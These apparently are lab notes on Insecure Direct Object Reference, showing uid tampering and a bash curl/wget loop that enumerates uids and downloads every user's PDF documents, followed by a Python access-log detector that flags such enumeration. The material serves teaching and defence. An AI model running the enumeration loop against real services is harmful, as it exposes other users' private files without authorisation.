Insecure Direct Object Reference (IDOR)

http://SERVER_IP:PORT/documents.php?uid=1
http://SERVER_IP:PORT/documents.php?uid=2

# Press Ctrl+U to view the page source; the document links appear in the HTML
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>

We can use bash to request the documents page for each uid from 1 to 10 and download every linked PDF

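#!/bin/bash

url="http://SERVER_IP:PORT"

# Request the documents page for each uid from 1 to 10
for i in {1..10}; do
        # Extract every /documents/...pdf link from the returned HTML
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "/documents.*?\.pdf"); do
                # $link already starts with "/", so append it directly to the base URL
                wget -q "$url$link"
        done
done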
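
From the defender's side, the loop above leaves a clear trace in the web server's access log: one client requesting documents.php with many different uid values. The following is an added example, not part of the original notes; the log format (common log format), the sample lines, the function names and the threshold are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2020:10:00:01 +0000] "GET /documents.php?uid=1 HTTP/1.1" 200 512
10.0.0.5 - - [03/Jun/2020:10:00:01 +0000] "GET /documents/Invoice_3_06_2020.pdf HTTP/1.1" 200 9000
10.0.0.5 - - [03/Jun/2020:10:00:02 +0000] "GET /documents.php?uid=2 HTTP/1.1" 200 498
10.0.0.5 - - [03/Jun/2020:10:00:02 +0000] "GET /documents.php?uid=3 HTTP/1.1" 200 530
10.0.0.5 - - [03/Jun/2020:10:00:03 +0000] "GET /documents.php?uid=4 HTTP/1.1" 200 501
10.0.0.5 - - [03/Jun/2020:10:00:03 +0000] "GET /documents.php?uid=5 HTTP/1.1" 200 507
10.0.0.9 - - [03/Jun/2020:10:05:00 +0000] "GET /documents.php?uid=3 HTTP/1.1" 200 530
10.0.0.9 - - [03/Jun/2020:10:07:30 +0000] "GET /documents.php?uid=3 HTTP/1.1" 200 530
10.0.0.7 - - [03/Jun/2020:10:09:00 +0000] "GET /documents.php?uid=2 HTTP/1.1" 200 498
10.0.0.7 - - [03/Jun/2020:10:09:05 +0000] "GET /index.php?uid=9 HTTP/1.1" 200 120
"""

# client address, then the request target inside the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')


def uids_by_client(log_text, path="/documents.php", param="uid"):
    """Map each client address to the set of distinct uid values it requested."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, target = m.groups()
        parts = urlsplit(target)
        if parts.path != path:
            continue  # only the endpoint that takes the object reference
        for value in parse_qs(parts.query).get(param, []):
            seen[client].add(value)
    return seen


def flag_enumeration(log_text, threshold=3):
    """Return {client: distinct uid count} for clients at or above the threshold."""
    return {client: len(uids)
            for client, uids in uids_by_client(log_text).items()
            if len(uids) >= threshold}


if __name__ == "__main__":
    for client, count in flag_enumeration(SAMPLE_LOG).items():
        print(f"{client} requested {count} distinct uid values")
```

A legitimate user normally requests only their own uid, so the threshold can stay low; where many users share one address (NAT, proxies), group by session identifier instead if the log records one.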
